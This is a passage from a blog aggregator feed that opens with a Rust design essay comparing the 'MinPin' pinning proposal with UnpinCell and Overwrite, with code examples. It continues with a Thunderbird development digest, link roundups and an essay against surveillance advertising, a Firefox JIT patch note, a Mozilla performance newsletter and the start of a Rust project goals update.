But some types do care about pinning. These are typically future implementations but they could be other special case things. In that case, you should explicitly implement !Unpin to declare yourself as pinnable. When you declare your methods, you have to make a choice

  • Is the method read-only? Then use &self, that always works.
  • Otherwise, use &mut self or pinned &mut self, depending…
    • If the method is meant to be called before pinning, use &mut self.
    • If the method is meant to be called after pinning, use pinned &mut self.

This design works well so long as all mutating methods can be categorized into before-or-after pinning. If you have methods that need to be used in both settings, you have to start using workarounds – in the limit, you make two copies.
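
As a rough illustration of that before/after split in today’s Rust (no MinPin syntax here; Recorder is a made-up address-sensitive type, and the unsafe projection stands in for what MinPin would make safe):

use std::marker::PhantomPinned;
use std::pin::Pin;

// A made-up address-sensitive type, for illustration only.
struct Recorder {
    buf: Vec<u8>,
    _pin: PhantomPinned, // opts out of `Unpin`, like MinPin's explicit `impl !Unpin`
}

impl Recorder {
    // Meant to be called *before* pinning: plain `&mut self` works as usual.
    fn reserve(&mut self, n: usize) {
        self.buf.reserve(n);
    }

    // Meant to be called *after* pinning: today that means `Pin<&mut Self>`,
    // which MinPin would let you write as `pinned &mut self`.
    fn record(self: Pin<&mut Self>, byte: u8) {
        // SAFETY: we only mutate `buf` in place and never move the value.
        let this = unsafe { self.get_unchecked_mut() };
        this.buf.push(byte);
    }

    // Read-only methods can keep using `&self` in both phases.
    fn len(&self) -> usize {
        self.buf.len()
    }
}

fn main() {
    let mut r = Recorder { buf: Vec::new(), _pin: PhantomPinned };
    r.reserve(16);                // before pinning
    let mut pinned = Box::pin(r); // from here on the value is pinned
    pinned.as_mut().record(42);   // after pinning
    assert_eq!(pinned.len(), 1);
}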

How does MinPin compare to UnpinCell?

Those of you who have been following the various posts in this area will recognize many elements from boats’ recent UnpinCell. While the proposals share many elements, there is also one big difference between them that makes a big difference in how they would feel when used. Which is overall better is not yet clear to me.

Let’s start with what they have in common. Both propose syntax for pinned references/borrows (albeit slightly different syntax) and both include a type for “opting out” from pinning (the eponymous UnpinCell<T> in UnpinCell, Unpinnable<T> in MinPin). Both also have a similar “special case” around Drop in which writing a drop impl with fn drop(&mut self) disables safe pin-projection.

Where they differ is how they manage generic structs like WrapFuture<F>, where it is not known whether or not they are Unpin.

struct WrapFuture<F: Future> {
    future: F,
}

Given a pinned &mut WrapFuture<F> reference (such as pinned &mut self inside a method), the question is whether we can project the field future:

impl<F: Future> WrapFuture<F> {
    fn method(pinned &mut self) {
        let f = pinned &mut self.future;
        //      -----------------------
        //      Is this allowed?
    }
}

There is a specific danger case that both sets of rules are trying to avoid. Imagine that WrapFuture<F> implements Unpin but F does not – e.g., imagine that you have a impl<F: Future> Unpin for WrapFuture<F>. In that case, the referent of the pinned &mut WrapFuture<F> reference is not actually pinned, because the type is unpinnable. If we permitted the creation of a pinned &mut F, where F: !Unpin, we would be under the (mistaken) impression that F is pinned. Bad.

UnpinCell handles this case by saying that projecting from a pinned &mut is only allowed so long as there is no explicit impl of Unpin for WrapFuture (“if [WrapFuture<F>] implements Unpin, it does so using the auto-trait mechanism, not a manually written impl”). Basically: if the user doesn’t say whether the type is Unpin or not, then you can do pin-projection. The idea is that if the self type is Unpin, that will only be because all fields are unpin (in which case it is fine to make pinned &mut references to them); if the self type is not Unpin, then the field future is pinned, so it is safe.

In contrast, in MinPin, this case is only allowed if there is an explicit !Unpin impl for WrapFuture:

impl<F: Future> !Unpin for WrapFuture<F> {
    // This impl is required in MinPin, but not in UnpinCell
}

Explicit negative impls are not allowed on stable, but they were included in the original auto trait RFC. The idea is that a negative impl is an explicit, semver-binding commitment not to implement a trait. This is different from simply not including an impl at all, which allows for impls to be added later.

Why would you prefer MinPin over UnpinCell or vice versa?

I’m not totally sure which of these is better. I came to the !Unpin impl based on my axiom that pin is its own world – the idea was that it was better to push types to be explicitly unpin all the time than to have “dual-mode” types that masquerade as sometimes pinned and sometimes not.

In general I feel like it’s better to justify language rules by the presence of a declaration than the absence of one. So I don’t like the idea of saying “the absence of an Unpin impl allows for pin-projection” – after all, adding impls is supposed to be semver-compliant. Of course, that’s much less true for auto traits, but it can still be true.

In fact, Pin has had some unsoundness in the past based on unsafe reasoning that was justified by the lack of an impl. We assumed that &T could never implement DerefMut, but it turned out to be possible to add weird impls of DerefMut in very specific cases. We fixed this by adding an explicit impl<T> !DerefMut for &T impl.

On the other hand, I can imagine that many explicitly implemented futures might benefit from being able to be ambiguous about whether they are Unpin.

What does your design axiom “Pin is its own world” mean?

The way I see it is that, in Rust today (and in MinPin, pinned places, UnpinCell, etc), if you have a T: !Unpin type (that is, a type that is pinnable), it lives a double life. Initially, it is unpinned, and you can move it, &-ref it, or &mut-ref it, just like any other Rust value. But once a !Unpin value becomes pinned to a place, it enters a different state, in which you can no longer move it or use &mut, you have to use pinned &mut:

flowchart TD
Unpinned[
    Unpinned: can access 'v' with '&' and '&mut'
]

Pinned[
    Pinned: can access 'v' with '&' and 'pinned &mut'
]

Unpinned --
    pin 'v' in place (only if T is '!Unpin')
--> Pinned
  

One-way transitions like this limit the amount of interop and composability you get in the language. For example, if my type has &mut methods, I can’t use them once the type is pinned, and I have to use some workaround, such as duplicating the method with pinned &mut.3 In this specific case, however, I don’t think this transition is so painful, and that’s because of the specifics of the domain: futures go through a pretty hard state change where they start in “preparation mode” and then eventually start executing. The set of methods you need at these two phases are quite distinct. So this is what I meant by “pin is its own world”: pin is not very interopable with Rust, but this is not as bad as it sounds, because you don’t often need that kind of interoperability.

How would Overwrite affect pin being in its own world?

With Overwrite, when you pin a value in place, you just gain the ability to use pinned &mut, you don’t give up the ability to use &mut:

flowchart TD
Unpinned[
    Unpinned: can access 'v' with '&' and '&mut'
]

Pinned[
    Pinned: can additionally access 'v' with 'pinned &mut'
]

Unpinned --
    pin 'v' in place (only if T is '!Unpin')
--> Pinned
  

Making pinning into a “superset” of the capabilities of being unpinned means that pinned &mut can be coerced into an &mut (it could even be a “true subtype”, in Rust terms). This in turn means that a pinned &mut Self method can invoke &mut self methods, which helps to make pin feel like a smoothly integrated part of the language.3

So does the axiom mean you think Overwrite is a bad idea?

Not exactly, but I do think that if Overwrite is justified, it is not on the basis of Pin, it is on the basis of immutable fields. If you just look at Pin, then Overwrite does make Pin work better, but it does that by limiting the capabilities of &mut to those that are compatible with Pin. There is no free lunch! As Eric Holk memorably put it to me in privmsg:

It seems like there’s a fixed amount of inherent complexity to pinning, but it’s up to us how we distribute it. Pin keeps it concentrated in a small area which makes it seem absolutely terrible, because you have to face the whole horror at once.4

I think Pin as designed is a “zero-conceptual-cost” abstraction, meaning that if you are not trying to use it, you don’t really have to care about it. That’s worth maintaining, if we can. If we are going to limit what &mut can do, the reason to do it is primarily to get other benefits, not to benefit pin code specifically.

To be clear, this is largely a function of where we are in Rust’s evolution. If we were still in the early days of Rust, I would say Overwrite is the correct call. It reminds me very much of the IMHTWAMA, the core “mutability xor sharing” rule at the heart of Rust’s borrow checker. When we decided to adopt the current borrow checker rules, the code was about 85-95% in conformance. That is, although there was plenty of aliased mutation, it was clear that “mutability xor sharing” was capturing a rule that we already mostly followed, but not completely. Because combining aliased state with memory safety is more complicated, that meant that a small minority of code was pushing complexity onto the entire language. Confining shared mutation to types like Cell and Mutex made most code simpler at the cost of more complexity around shared state in particular.

There’s a similar dynamic around replace and swap. Replace and swap are only used in a few isolated places and in a few particular ways, but all the code has to be more conservative to account for that possibility. If we could go back, I think limiting Replace to some kind of Replaceable<T> type would be a good move, because it would mean that the more common case can enjoy the benefits: fewer borrow check errors and more precise programs due to immutable fields and the ability to pass an &mut SomeType and be sure that your callee is not swapping the value under your feet (useful for the “scope pattern” and also enables Pin<&mut> to be a subtype of &mut).

Why did you adopt pinned &mut and not &pin mut as the syntax?

The main reason was that I wanted a syntax that scaled to Pin<Box<T>>. But also the pin! macro exists, making the pin keyword somewhat awkward (though not impossible).

One thing I was wondering about is the phrase “pinned reference” or “pinned pointer”. On the one hand, it is really a reference to a pinned value (which suggests &pin mut). On the other hand, I think this kind of ambiguity is pretty common. The main thing I have found is that my brain has trouble with Pin<P> because it wants to think of Pin as a “smart pointer” versus a modifier on another smart pointer. pinned Box<T> feels much better this way.

Can you show me an example? What about the MaybeDone example?

Yeah, totally. boats’ pinned places post introduced two futures, MaybeDone and Join. Here is how MaybeDone would look in MinPin, along with some inline comments:

enum MaybeDone<F: Future> {
    Polling(F),
    Done(Unpinnable<Option<F::Output>>),
    //   ---------- see below
}

impl<F: Future> !Unpin for MaybeDone<F> { }
//              -----------------------
//
// `MaybeDone` is address-sensitive, so we
// opt out from `Unpin` explicitly. I assumed
// opting out from `Unpin` was the *default* in
// my other posts.

impl<F: Future> MaybeDone<F> {
    fn maybe_poll(pinned &mut self, cx: &mut Context<'_>) {
        if let MaybeDone::Polling(fut) = self {
            //                    ---
            // This is in fact pin-projection, although
            // it's happening implicitly as part of pattern
            // matching. `fut` here has type `pinned &mut F`.
            // We are permitted to do this pin-projection
            // to `F` because we know that `Self: !Unpin`
            // (because we declared that to be true).
            
            if let Poll::Ready(res) = fut.poll(cx) {
                *self = MaybeDone::Done(Unpinnable { value: Some(res) });
            }
        }
    }

    fn is_done(&self) -> bool {
        matches!(self, &MaybeDone::Done(_))
    }

    fn take_output(pinned &mut self) -> Option<F::Output> {
        //         ----------------
        //     This method is called after pinning, so it
        //     needs a `pinned &mut` reference...  

        if let MaybeDone::Done(res) = self {
            res.value.take()
            //  ------------
            //
            //  ...but take is an `&mut self` method
            //  and `F::Output: Unpin` is not known to hold.
            //  
            //  Therefore we have made the type in `Done`
            //  be `Unpinnable`, so that we can do this
            //  swap.
        } else {
            None
        }
    }
}

Can you translate the Join example?

Yep! Here is Join:

struct Join<F1: Future, F2: Future> {
    fut1: MaybeDone<F1>,
    fut2: MaybeDone<F2>,
}

impl<F1: Future, F2: Future> !Unpin for Join<F1, F2> { }
//                           ----------------------
//
// Join is a custom future, so implement `!Unpin`
// to gain access to pin-projection.

impl<F1: Future, F2: Future> Future for Join<F1, F2> {
    type Output = (F1::Output, F2::Output);

    fn poll(pinned &mut self, cx: &mut Context<'_>) -> Poll<Self::Output> {
        // The calls to `maybe_poll` and `take_output` below
        // are doing pin-projection from `pinned &mut self`
        // to a `pinned &mut MaybeDone<F1>` (or `F2`) type.
        // This is allowed because we opted out from `Unpin`
        // above.

        self.fut1.maybe_poll(cx);
        self.fut2.maybe_poll(cx);
        
        if self.fut1.is_done() && self.fut2.is_done() {
            let res1 = self.fut1.take_output().unwrap();
            let res2 = self.fut2.take_output().unwrap();
            Poll::Ready((res1, res2))
        } else {
            Poll::Pending
        }
    }
}

What’s the story with Drop and why does it matter?

Drop’s current signature takes &mut self. But recall that once a !Unpin type is pinned, it is only safe to use pinned &mut. This is a combustible combination. It means that, for example, I can write a Drop that uses mem::replace or swap to move values out from my fields, even though they have been pinned.
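
To make the hazard concrete, here is a sketch in today’s Rust (SelfRef is a made-up address-sensitive type; the point is precisely that this compiles):

use std::marker::PhantomPinned;

// A made-up address-sensitive type: `!Unpin`, and it might hand out
// pointers into `data` that assume the value never moves.
struct SelfRef {
    data: String,
    _pin: PhantomPinned,
}

impl Drop for SelfRef {
    // Today `Drop::drop` always takes `&mut self`, even if the value was
    // pinned, so nothing stops us from moving the field out:
    fn drop(&mut self) {
        let stolen = std::mem::replace(&mut self.data, String::new());
        println!("moved out of a (possibly pinned) value: {stolen}");
    }
}

fn main() {
    let pinned = Box::pin(SelfRef { data: "pinned data".to_string(), _pin: PhantomPinned });
    drop(pinned); // runs the `&mut self` drop above, despite the pinning
}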

For types that are always Unpin, this is no problem, because &mut self and pinned &mut self are equivalent. For types that are always !Unpin, I’m not too worried, because Drop as-is is a poor fit for them, and pinned &mut self will be better.

The tricky bit is types that are conditionally Unpin. Consider something like this:

struct LogWrapper<T> {
    value: T,
}

impl<T> Drop for LogWrapper<T> {
    fn drop(&mut self) {
        ...
    }
}

At least today, whether or not LogWrapper is Unpin depends on whether T: Unpin, so we can’t know it for sure.

The solution that boats and I both landed on effectively creates three categories of types:5

  • those that implement Unpin, which are unpinnable;
  • those that do not implement Unpin but which have fn drop(&mut self), which are unsafely pinnable;
  • those that do not implement Unpin and do not have fn drop(&mut self), which are safely pinnable.

The idea is that using fn drop(&mut self) puts you in this purgatory category of being “unsafely pinnable” (it might be more accurate to say being “maybe unsafely pinnable”, since often at compilation time with generics we won’t know if there is an Unpin impl or not). You don’t get access to safe pin projection or other goodies, but you can do projection with unsafe code (e.g., the way the pin-project-lite crate does it today).
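
For reference, manual unsafe projection in today’s Rust looks roughly like this (Wrapper is a made-up type; pin-project-lite generates morally equivalent code for you):

use std::pin::Pin;

// Made-up wrapper; `inner` is the structurally pinned field.
struct Wrapper<F> {
    inner: F,
}

impl<F> Wrapper<F> {
    // Manual pin projection.
    fn inner_pin(self: Pin<&mut Self>) -> Pin<&mut F> {
        // SAFETY: `inner` is never moved out of `self`, and `Wrapper` has
        // no `fn drop(&mut self)` that could move it either.
        unsafe { self.map_unchecked_mut(|this| &mut this.inner) }
    }
}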

It feels weird to have Drop let you use &mut self when other traits don’t.

Yes, it does, but in fact any method whose trait uses pinned &mut self can be implemented safely with &mut self so long as Self: Unpin. So we could just allow that in general. This would be cool because many hand-written futures are in fact Unpin, and so they could implement the poll method with &mut self.
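
Concretely, that is already the shape of many hand-written Unpin futures today (YieldOnce is a made-up example; Pin::get_mut is the safe escape hatch that exists precisely because Self: Unpin):

use std::future::Future;
use std::pin::Pin;
use std::task::{Context, Poll};

// A made-up future that yields once before completing. It holds only
// `Unpin` data, so the whole type is `Unpin`.
struct YieldOnce {
    yielded: bool,
}

impl Future for YieldOnce {
    type Output = ();

    fn poll(self: Pin<&mut Self>, cx: &mut Context<'_>) -> Poll<()> {
        // Because `Self: Unpin`, we can safely drop down to `&mut Self`,
        // which is morally the `&mut self` impl MinPin would allow.
        let this = self.get_mut();
        if this.yielded {
            Poll::Ready(())
        } else {
            this.yielded = true;
            cx.waker().wake_by_ref();
            Poll::Pending
        }
    }
}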

Wait, so if Unpin types can use &mut self, why do we need special rules for Drop?

Well, it’s true that an Unpin type can use &mut self in place of pinned &mut self, but in fact we don’t always know when types are Unpin. Moreover, per the zero-conceptual-cost axiom, we don’t want people to have to know anything about Pin to use Drop. The obvious approaches I could think of all either violated that axiom or just… well… seemed weird:

  • Permit fn drop(&mut self) but only if Self: Unpin seems like it would work, since most types are Unpin. But in fact types, by default, are only Unpin if their fields are Unpin, and so generic types are not known to be Unpin. This means that if you write a Drop impl for a generic type and you use fn drop(&mut self), you will get an error that can only be fixed by implementing Unpin unconditionally. Because “pin is its own world”, I believe adding the impl is fine, but it violates “zero-conceptual-cost” because it means that you are forced to understand what Unpin even means in the first place.
  • To address that, I considered treating fn drop(&mut self) as implicitly declaring Self: Unpin. This doesn’t violate our axioms but just seems weird and kind of surprising. It’s also backwards incompatible with pin-project-lite.

These considerations led me to conclude that the current design actually puts us in a place where we want three categories. I think in retrospect it’d be better if Unpin were implemented by default but not as an auto trait (i.e., all types were unconditionally Unpin unless they declare otherwise), but oh well.

What is the forwards compatibility story for Overwrite?

I mentioned early on that MinPin could be seen as a first step that can later be extended with Overwrite if we choose. How would that work?

Basically, if we did the s/Unpin/Overwrite/ change, then we would

  • rename Unpin to Overwrite (literally rename, they would be the same trait);
  • prevent overwriting the referent of an &mut T unless T: Overwrite (or replacing, swapping, etc).

These changes mean that &mut T is pin-preserving. If T: !Overwrite, then T may be pinned, but then &mut T won’t allow it to be overwritten, replaced, or swapped, and so pinning guarantees are preserved (and then some, since technically overwrites are ok, just not replacing or swapping). As a result, we can simplify the MinPin rules for pin-projection to the following:

Given a reference s: pinned &mut S, the rules for projection of the field f are as follows:

  • &mut projection is allowed via &mut s.f.
  • pinned &mut projection is allowed via pinned &mut s.f if S: !Unpin

What would it feel like if we adopted Overwrite?

We actually got a bit of a preview when we talked about MaybeDone. Remember how we had to introduce Unpinnable around the final value so that we could swap it out? If we adopted Overwrite, I think the TL;DR of how code would be different is that most any code that today uses std::mem::replace or std::mem::swap would probably wind up using an explicit Unpinnable-like wrapper. I’ll cover this later.

This goes a bit to show what I meant about there being a certain amount of inherent complexity that we can choose to distribute: in MinPin, this pattern of wrapping “swappable” data is isolated to pinned &mut self methods in !Unpin types. With Overwrite, it would be more widespread (but you would get more widespread benefits, as well).

Conclusion

My conclusion is that this is a fascinating space to think about!6 So fun.


  1. Hat tip to Tyler Mandry and Eric Holk who discussed these ideas with me in detail. ↩︎

  2. MinPin is the “minimal” proposal that I feel meets my desiderata; I think you could devise a maximally minimal proposal that is even smaller if you truly wanted. ↩︎

  3. It’s worth noting that coercions and subtyping though only go so far. For example, &mut can be coerced to &, but we often need methods that return “the same kind of reference they took in”, which can’t be managed with coercions. That’s why you see things like last and last_mut↩︎ ↩︎

  4. I would say that the current complexity of pinning is, in no small part, due to accidental complexity, as demonstrated by the recent round of exploration, but Eric’s wider point stands. ↩︎

  5. Here I am talking about the category of a particular monomorphized type in a particular version of the crate. At that point, every type either implements Unpin or it doesn’t. Note that at compilation time there is more grey area, as they can be types that may or may not be pinnable, etc. ↩︎

  6. Also that I spent way too much time iterating on this post. JUST GONNA POST IT. ↩︎

Mozilla ThunderbirdThunderbird Monthly Development Digest: October 2024

Hello again Thunderbird Community! The last few months have involved a lot of learning for me, but I have a much better appreciation (and appetite!) for the variety of challenges and opportunities ahead for our team and the broader developer community. Catch up with last month’s update, and here’s a quick summary of what’s been happening across the different teams:

Exchange Web Services support in Rust

An important member of our team left recently and while we’ll very much miss their spirit and leadership, we all learned a lot and are in a good position to carry the project forwards. We’ve managed to unstick a few pieces of the backlog and have a few sprints left to complete work on move/copy operations, protocol logging and priority two operations (flagging messages, folder rename & delete, etc). New team members have moved past the most painful stages and have patches that have landed. Kudos to the patient mentors involved in this process!

QR Code Cross-Device Account Import

Thunderbird for Android launched this week, and the desktop client (Daily, Beta & ESR 128.4.0) now provides a simple and secure account transfer mechanism, so that account settings don’t have to be re-entered for new users of the mobile app. Download Thunderbird for Android from the Play store

Account Hub

Development of a refreshed account hub is moving forward apace and with the critical path broken down into sprints, our entire front end team is working to complete things in the next two weeks. Meta bug & progress tracking.

Clean up on aisle 2

In addition to our project work, we’ve had to be fairly nimble this month, with a number of upstream changes breaking our builds and pipelines. We get a ton of benefit from the platforms we inherit but at times it feels like we’re dealing with many things out of our control. Mental note: stay calm and focus on future improvements!

Global Database, Conversation View & folder corruption issues

On top of the conversation view feature and core refactoring to tackle the inner workings of thread-safe folder and message manipulation, work to implement a long term database replacement is well underway. Preliminary patches are regularly pumped into the development ecosystem for discussion and review, for which we’re very excited!

In-App Notifications

With phase 1 of this project now complete, we’ve scoped out additions that will make it even more flexible and suitable for a variety of purposes. Beta users will likely see the first notifications coming in November, so keep your eyes peeled. Meta Bug & progress tracking.

New Features Landing Soon

Several requested features are expected to debut this month (or very soon) and include…

As usual, if you want to see things as they land, and help us squash some early bugs, you can always check the pushlog and try running daily, which would be immensely helpful for catching things early.

See you next month.

Toby Pilling

Senior Manager, Desktop Engineering

The post Thunderbird Monthly Development Digest: October 2024 appeared first on The Thunderbird Blog.

Don Martilinks for 3 November 2024

Remote Startups Will Win the War for Top Talent Ironically, in another strike against the spontaneous collaboration argument, a study of two Fortune 500 headquarters found that transitioning from cubicles to an open office layout actually reduced face-to-face interactions by 70 percent.

Why Strava Is a Privacy Risk for the President (and You Too) Not everybody uses their real names or photos on Strava, but many do. And if a Strava account is always in the same place as the President, you can start to connect a few dots.

Why Getting Your Neighborhood Declared a Historic District Is a Bad Idea Historic designations are commonly used to control what people can do with their own private property, and can be a way of creating a kind of “backdoor” homeowners association. Some historic neighborhoods (many of which have dubious claims to the designation) around the country have HOA-like restrictions on renovations, repairs, and even landscaping.

Donald Trump Talked About Fixing McDonald’s Ice Cream Machines. Lina Khan Actually Did. Back in March, the FTC submitted a comment to the US Copyright Office asking to extend the right to repair certain equipment, including commercial soft-serve equipment.

An awful lot of FOSS should thank the Academy Linux and open source in general seem to be huge components of the movie special effects industry – to an extent that we had not previously realized. (unless you have a stack of old Linux Journal back issues from the early 2000s—we did a lot of movie covers at the time that much of this software was being developed.)

Using an 8K TV as a Monitor For programming, word processing, and other productive work, consider getting an 8K TV instead of a multi-monitor setup. An 8K TV will have superior image quality, resolution, and versatility compared to multiple 4K displays, at roughly the same size. (huge TVs are an under-rated, subsidized technology, like POTS lines. Most or all of the huge TVs available today are smart and sold with the expectation that they’ll drive subscription and advertising revenue, which means a discount for those who use them as monitors.)

Suchir Balaji, who spent four years at OpenAI, says OpenAI’s use of copyrighted data broke the law and failed to meet fair use criteria; he left in August 2024 Mr. Balaji believes the threats are more immediate. ChatGPT and other chatbots, he said, are destroying the commercial viability of the individuals, businesses and internet services that created the digital data used to train these A.I. systems.

The Unlikely Inventor of the Automatic Rice Cooker Fumiko, the mother of six children, spent five years researching and testing to document the ideal recipe. She continued to make rice three times a day, carefully measuring water-to-rice ratios, noting temperatures and timings, and prototyping rice-cooker designs. Conventional wisdom was that the heat source needed to be adjusted continuously to guarantee fluffy rice, but Fumiko found that heating the water and rice to a boil and then cooking for exactly 20 minutes produced consistently good results.

Comments on TSA proposal for decentralized nonstandard ID requirements Compliance with the REAL-ID Act requires a state to electronically share information concerning all driver’s licenses and state-issued IDs with all other states, but not all states do so. Because no state complies with this provision of the REAL-ID Act, or could do so unless and until all states do so, no state-issued driver’s licenses or ID cards comply with the REAL-ID Act.

Don Martior we could just not

previously: Sunday Internet optimism

The consensus, dismal future of the Internet is usually wrong. Dystopias make great fiction, but the Internet is surprisingly good at muddling through and reducing each one to nuisance level.

  • We don’t have Clipper Chip dystopia that would have put backdoors in all cryptography.

  • We don’t have software patent cartel dystopia that would have locked everyone in to limited software choices and functionality, and a stagnant market.

  • We don’t have Fritz Chip dystopia that would have mandated Digital Rights Management on all devices.

None of these problems have gone away entirely—encryption backdoors, patent trolls, and DRM are all still there—but none have reached either Internet-wide catastrophe level or faded away entirely.

Today’s hottest new dystopia narrative is that we’re going to end up with surveillance advertising features in web browsers. They’ll be mathematically different from old-school cookie tracking, so technically they won’t make it possible to identify anyone individually, but they’ll still impose the same old surveillance risks on users, since real-world privacy risks are collective.

Compromising with the dystopia narrative always looks like the realistic or grown-up path forward, until it doesn’t. And then the non-dystopia timeline generally looks inevitable once you get far enough along it. This time it’s the same way. We don’t need cross-context personalized (surveillance) advertising in our web browsers any more than we need SCO licenses in our operating systems (not counting the SCO license timeline as dystopia, but it’s another good example of a dismal timeline averted). Let’s look at the numbers. I’m going to make all the assumptions most favorable to the surveillance advertising argument. It’s actually probably a lot better than this. And it’s probably better in other countries, since the USA is relatively advanced in the commercial surveillance field. (If you have these figures for other countries, please let me know and I’ll link to them.)

Total money spent on advertising in the USA: $389.49 billion

USA population: 335,893,238

That comes out to about $1,160 spent on advertising to reach the average person in the USA every year. That’s $97 per month.

So let’s assume (again, making the assumption most favorable to the surveillance side) that all advertising is surveillance advertising. And ads without the surveillance, according to Professor Garrett Johnson, are worth 52 percent less than the surveillance ads.

So if you get rid of the surveillance, your ad subsidy goes from $97 to $46. Advertisers would be spending $51 less to advertise to you, and the missing $51 is a good-sized amount of extra money to come up with every month. But remember, that’s advertising money, total, not the amount that actually makes it to the people who make the ad-supported resources you want. Since the problem is how to replace the income for the artists, writers, and everyone else who makes ad-supported content, we need to multiply the missing ad subsidy by the fraction of that top-level advertising total that makes it through to the content creator in order to come up with the amount of money that needs to be filled in from other sources like subscriptions and memberships.

How much do you need to spend on subscriptions to replace $51 in ad money? That’s going to depend on your habits. But even if you have everything set up totally right, a dollar spent on ads to reach you will buy you less than a dollar you spend yourself. Thomas Baekdal writes, in How independent publishing has changed from the 1990s until today,

Up until this point, every publisher had focused on ‘traffic at scale’, but with the new direct funding focus, every individual publisher realized that traffic does not equal money, and you could actually make more money by having an audience who paid you directly, rather than having a bunch of random clicks for the sake of advertising. The ratio was something like 1:10,000. Meaning that for every one person you could convince to subscribe, donate, become a member, or support you on Patreon … you would need 10,000 visitors to make the same amount from advertising. Or to put that into perspective, with only 100 subscribers, I could make the same amount of money as I used to earn from having one million visitors.

All surveillance ad media add some kind of adtech tax. The Association of National Advertisers found that about 1/3 of the money spent to buy ad space makes it through to the publisher.

A subscription platform and subscriber services impose some costs too. To be generous to the surveillance side, let’s say that a subscription dollar is only three times as valuable as an advertising dollar. So that $51 in missing ad money means you need to come up with $17 from somewhere. This estimate is really on the high side in practice. A lot of ad money goes to overhead and to stuff like retail ad networks (online sellers bidding for better spots in shopping search results) and to ad media like billboards that don’t pay for content at all.

So, worst case, where do you get the $17? From buying less crap, that’s where. Mustri et al. (PDF) write,

[behaviorally] targeted ads are more likely to be associated with lower quality vendors, and higher prices for identical products…

You also get a piece of the national security and other collective security benefits of eliminating surveillance, some savings in bandwidth and computing resources, and a lower likelihood of becoming a victim of fraud and identity theft. But that’s pure bonus benefit on top of the win from saving money by spending less on overpriced, personally targeted, low-quality products. (If privacy protection didn’t help you buy better stuff, the surveillance companies would have said so by now.) Because surveillance advertising gives an advantage to deceptive advertisers over legit ones, the end of surveillance advertising would also mean an increase in sales for legit brands.

And we’re not done. As a wise man once said, But wait! There’s more! Before you rush to do effective privacy tips or write to your state legislators to support anti-surveillance laws, there’s one more benefit to getting rid of surveillance/personalized advertising. Remember that extra $51 that went away? It didn’t get burned up in a fire just because it didn’t get spent on surveillance advertising. Companies still have it, and they still want to sell you stuff. Without surveillance, they’ll have to look for other ways to spend it. And many of the options are win-win for the customer. In Product is the P all marketers should strive to influence, Mark Ritson points out the marketing wins from incremental product improvements, and that’s the kind of work that often gets ignored in favor of niftier, short-term, surveillance advertising projects. Improving service and pricing are other areas that will also do better without surveillance advertising contending for budgets. There is a lot of potential gain for a lot of people in getting rid of surveillance advertising, so let’s not waste the opportunity. Don’t worry, we’ll get another Internet dystopia narrative to worry about eventually.

More: stop putting privacy-enhancing technologies in web browsers

Related

Product is the P all marketers should strive to influence If there is one thing I have learned from a thousand customers discussing a hundred different products it’s that the things a company thinks are small are, from a consumer perspective, big. And the grand improvements the company is spending bazillions on are probably of little significance. Finding out from the source what needs to be fixed or changed and then getting it done is the quiet product work of proper marketers. (yes, I linked to this twice.)

I Bought Tech Dupes on Temu. The Shoddy Gear Wasn’t Worth the $1,260 in Savings My journey into the shady side of shopping brought me to the world of dupes — from budget alternatives to bad knockoffs of your favorite tech.

Political fundraisers WinRed and ActBlue are taking millions of dollars in donations from elderly dementia patients to fuel their campaigns [S]ome of these elderly, vulnerable consumers have unwittingly given away six-figure sums – most often to Republican candidates – making them among the country’s largest grassroots political donors.

Bonus links

Marketers in a dying internet: Why the only option is a return to simplicity With machine-generated content now cluttering the most visible online touchpoints (like the frontpage of Google, or your Facebook timeline), it feels inevitable that consumer behaviors will shift as a result. And so marketers need to change how they reach target audiences.

I attended Google’s creator conversation event, and it turned into a funeral

Is AI advertising going to be too easy for its own good? As Rory Sutherland said, When human beings process a message, we sort of process how much effort and love has gone into the creation of this message and we pay attention to the message accordingly. It’s costly signaling of a kind.

How Google is Killing Bloggers and Small Publishers – And Why

Exploiting Meta’s Weaknesses, Deceptive Political Ads Thrived on Facebook and Instagram in Run-Up to Election

Ninth Circuit Upholds AADC Ban on “Dark Patterns”

Economist ‘future-proofing’ bid brings back brand advertising and targets students

The Talospace ProjectUpdated Baseline JIT OpenPOWER patches for Firefox 128ESR

I updated the Baseline JIT patches to apply against Firefox 128ESR; if you use the Mercurial rebase extension (and you should), it will rebase automatically — it did for me — with only one file needing a manual merge. Nevertheless, everything is up to date against tip again, and this patchset works fine for both Firefox and Thunderbird. I kept the fix for bug 1912623 because I think Mozilla's fix in bug 1909204 is wrong (or at least suboptimal) and this is faster on systems without working Wasm. Speaking of, I need to get back into porting rr to ppc64le so I can solve those startup crashes.

Mozilla Performance BlogPerformance Testing Newsletter (Q3 Edition)

Welcome to the latest edition of the Performance Testing Newsletter! The PerfTools team empowers engineers with tools to continuously improve the performance of Mozilla products.

Last quarter was MozWeek, and we had a great time meeting a number of you in our PerfTest Regression Workshop – thank you all for joining us, and making it a huge success! If you didn’t get a chance to make it, you can find the slides here, and most of the information from the workshop (including some additional bits) can be found in this documentation page. We will be running this workshop again next MozWeek, along with a more advanced version.

See below for highlights from the changes made in the last quarter.

Highlights

Blog Posts ✍️

Contributors

  • Myeongjun Go [:myeongjun]
  • Mayank Bansal [:mayankleoboy1]

If you have any questions, or are looking to add performance testing for your code component, you can find us in #perftest on Element, or #perf-help on Slack.

The Rust Programming Language BlogOctober project goals update

The Rust project is currently working towards a slate of 26 project goals, with 3 of them designated as flagship goals. This post provides selected updates on our progress towards these goals (or, in some cases, lack thereof). The full details for any particular goal are available in its associated tracking issue on the rust-project-goals repository.

Flagship goals

The biggest elements of our goal are solving the "send bound" problem via return-type notation (RTN) and adding support for async closures. This month we made progress towards both. For RTN, @compiler-errors extended the return-type notation implementation, landing support for using RTN in self-types like where Self::method(): Send. He also authored a blog post with a call for testing explaining what RTN is and how it works. For async closures, the lang team reached a preliminary consensus on the async Fn syntax, with the understanding that it will also include some "async type" syntax. This rationale was documented in RFC #3710, which is now open for feedback. The team held a design meeting on Oct 23 and @nikomatsakis will be updating the RFC with the conclusions.
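
For readers who have not followed RTN, here is a rough, compile-only nightly sketch of the kind of bound involved (the Database trait and assert_send helper are made up; the RFC spells the bound with (..), and the surface syntax may still change before stabilization):

#![feature(return_type_notation)]
#![allow(incomplete_features)] // may be needed on some nightlies

trait Database {
    // `async fn` in a trait returns an anonymous future type,
    // which normally cannot be named in a bound.
    async fn fetch(&self) -> u32;
}

fn assert_send<T: Send>(_: T) {}

// RTN: bound the return type of `fetch` without naming it.
fn check<D: Database>(db: &D)
where
    D::fetch(..): Send,
{
    // Compiles only because the where clause promises the future is `Send`.
    assert_send(db.fetch());
}

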